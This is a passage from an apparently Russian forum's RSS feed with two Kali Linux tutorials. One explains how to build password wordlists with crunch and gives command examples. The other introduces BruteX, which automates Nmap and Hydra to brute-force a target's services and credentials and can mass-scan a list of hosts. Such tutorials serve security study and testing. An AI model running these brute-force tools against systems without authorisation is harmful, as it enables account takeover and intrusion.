style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 3 7 abcdef&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Этот пример создаст все пароли от 3 до 7 символов, содержащих символы &apos;abcdef&apos; в качестве набора символов и выведет всё это в стандартный вывод.&lt;br /&gt;&lt;br /&gt;Ещё один пример:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch &lt;минимальная-длинна&gt; &lt;максимальная длина&gt; &amp;#91;-f &lt;путь до charset.lst&gt; имя-набора-символов]&amp;nbsp;&amp;#91;-o wordlist.txt или START]&amp;nbsp;&amp;#91;-t &amp;#91;FIXED]@@@@]&amp;nbsp;&amp;#91;-s startblock]&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;1) @ означает символы в нижнем регистре&lt;br /&gt;2) , означает символы в верхнем регистре&lt;br /&gt;3) % означает цифры&lt;br /&gt;4) ^ означает разные символы, общим количеством 33. Вы можете посмотреть их командой:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 1 1 -t ^&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color:#980000&quot;&gt;&lt;b&gt;Как создать словарь в crunch&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Перейдите в Приложения &gt; Kali Linux &gt; Password Attacks &gt; Offline Attacks &gt; crunch&lt;br /&gt;&lt;br /&gt;Или введите в Терминале:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Правила для создания словаря.&lt;br /&gt;&lt;br /&gt;crunch &lt;min&gt; &lt;max&gt; &lt;charset&gt; -t &lt;pattern&gt; – o &lt;filename.lst&gt;&lt;br /&gt;&lt;br /&gt;Где,&lt;br /&gt;&lt;br /&gt;a) &lt;b&gt;min&lt;/b&gt; - минимальное количество символов в паролях словаря&lt;br /&gt;b) &lt;b&gt;max&lt;/b&gt; - максимальное количество символов в паролях словаря&lt;br /&gt;c) &lt;b&gt;charset&lt;/b&gt; - символы, которые хотите добавить в пароли в словаре. Например: abcd или 123455&lt;br /&gt;d) &lt;b&gt;pattern&lt;/b&gt; - образец пароля. Например хотите создать словарь вида 98*******, т.е. первые две цифры будут статические и последние цифры - переменными.&lt;br /&gt;&lt;br /&gt;Например, я хочу создать словарь из минимум 10 цифр, максимум 10 цифр, с символами abcd987 и образцом abc@@@@@@@ с последующим сохранением файла словаря на рабочем столе.&lt;br /&gt;&lt;br /&gt;Вводим в терминале:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 10 10 abcd987 -t abc@@@@@@@ -o /root/Desktop/file.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;это создаст 823543 комбинаций пароля.&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/crunch_info/crunch_info.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/crunch_info/crunch_info200.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color:#980000&quot;&gt;&lt;b&gt;Примеры использования crunch&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1) Пример - отобразить список слов, который начинается с a и заканчивается на zzzzzzz:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 1 7&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;2) Пример - отобразить список слов, в паролях которого используется набор abcdefg который начинается на a и заканчивается gggggg&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 1 6 abcdefg&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;3) Пример - В конце строки есть символ пробела. Чтобы crunch мог использовать пробел, вам нужно экранировать его, поставив перед ним символ &amp;#92;. В этом примере вы можете также использовать кавычки вокруг букв тогда вам не нужен &amp;#92;, например &quot;abcdefg &quot;. Crunch отобразит список слов, использующих набор символов abcdefg , который начинается на a, а заканчивается на шесть пробелов.&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 1 6 abcdefg&amp;#92;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt;4) Пример - будет использован набор символов mixalpha-numeric-all-space из charset.lst и выведет сгенерированые пароли в файл с названием wordlist.txt. Этот файл начнётся с a и закончится на &quot; &quot;&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;5) Пример - восьми-символьный список слов, используя набор символов mixalpha-number-all-space character set из charset.lst и запишет список паролей в файл wordlist.txt. Файл начнётся с cbdogaaa и закончится на &quot; dog &quot;&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;6) Пример - сгенерирует список паролей длинной в 11 цифр и начинающийся на 8921&lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;crunch 11 11 -t 8905%%%%%%%&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-18-1</guid>
		</item>
		<item>
			<title>BruteX</title>
			<link>https://usehelp.clan.su/forum/17-17-1</link>
			<pubDate>Sun, 14 Feb 2016 17:28:08 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: программа для автоматического брутфорса всех служб&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;b&gt;BruteX&lt;/b&gt; — это скрипт, автоматизирующий работу других программ (NMap, Hydra, Wfuzz, SNMPWalk, DNSDict).&lt;br /&gt;Этот скрипт является прекрасным примером, для чего нужно изучать программирование шелл скриптов и как можно автоматизировать процесс анализа одной или многих целей. Как может проходить типичный анализ целевого сайта?&lt;br /&gt;Сканируем NMap&apos;ом открытые порты и определяем запущенные на целевом сервере службы. После этого, например, начинаем брутфорсить FTP, SSH и другие службы с помощью Hydra и т. д. Нам нужно анализировать результаты работы предыдущих команд, вводить новые команды и т. д.&lt;br /&gt;Одновременно мы можем работать с одним сайтом. BruteX делает то же самое, но автоматически — сам сканирует, сам запускает брутфорсинг. Возможно массовое сканирование (с помощью brutex-massscan).&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;BruteX проиозводит автоматический брутфорсинг всех служб&lt;/i&gt;&lt;/b&gt;, включая:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Открытые порты&lt;/i&gt;&lt;br /&gt;&lt;i&gt;DNS домены&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Веб-файлы&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Веб-директории&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Имена пользователей&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Пароли&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;﻿&lt;!--uzquote--&gt;&lt;div class=&quot;bbQuoteBlock&quot;&gt;&lt;div class=&quot;bbQuoteName&quot; style=&quot;padding-left:5px;font-size:7pt&quot;&gt;&lt;b&gt;Цитата&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;quoteMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzq--&gt;git clone &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/dfT1DQ&quot; title=&quot;https://github.com/1N3/BruteX.git&quot; rel=&quot;nofollow&quot;&gt;https://github.com/1N3/BruteX.git&lt;/a&gt; &lt;!--/uzq--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzquote--&gt; &lt;br /&gt;&lt;br /&gt;﻿&lt;!--uzquote--&gt;&lt;div class=&quot;bbQuoteBlock&quot;&gt;&lt;div class=&quot;bbQuoteName&quot; style=&quot;padding-left:5px;font-size:7pt&quot;&gt;&lt;b&gt;Цитата&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;quoteMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzq--&gt;./brutex target&lt;!--/uzq--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzquote--&gt;&lt;br /&gt;Где &lt;b&gt;target&lt;/b&gt; — это целевой сайт или IP.&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/kaliLinux/BruteX_kali1.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/kaliLinux/BruteX_kali1_300.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Для брутфорса множества хостов используйте brutex-massscan а сами IP/имена хостов для сканирования запишите в файл targets.txt.&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/kaliLinux/BruteX_kali2.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/kaliLinux/BruteX_kali2_300.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt;</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-17-1</guid>
		</item>
	</channel>
</rss>